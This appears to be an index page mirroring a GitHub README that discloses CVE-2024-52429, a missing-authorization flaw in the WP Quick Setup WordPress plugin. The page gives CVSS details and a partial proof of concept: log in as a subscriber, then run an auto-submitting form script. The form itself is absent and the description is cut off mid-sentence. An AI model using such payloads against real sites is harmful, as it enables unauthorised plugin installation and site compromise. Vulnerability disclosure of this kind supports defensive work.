Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/randomrobbiebf/cve-2024-52429
WP Quick Setup <= 2.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin/Theme Installation
https://github.com/randomrobbiebf/cve-2024-52429
Last synced: 12 days ago
JSON representation
WP Quick Setup <= 2.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin/Theme Installation
- Host: GitHub
- URL: https://github.com/randomrobbiebf/cve-2024-52429
- Owner: RandomRobbieBF
- Created: 2024-11-22T10:26:55.000Z (about 1 month ago)
- Default Branch: main
- Last Pushed: 2024-11-22T10:28:33.000Z (about 1 month ago)
- Last Synced: 2024-11-22T11:26:07.107Z (about 1 month ago)
- Size: 0 Bytes
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# CVE-2024-52429
WP Quick Setup <= 2.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin/Theme Installation# Description:
The WP Quick Setup plugin for WordPress is vulnerable to unauthorized plugin and theme installation due to a missing capability check on a function in all versions up to, and including, 2.0. This makes it
```
Type: plugin
CVSS Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVE: CVE-2024-52429
```POC
---Login as a subscriber then run this html
```
history.pushState('', '', '/');
document.forms[0].submit();
```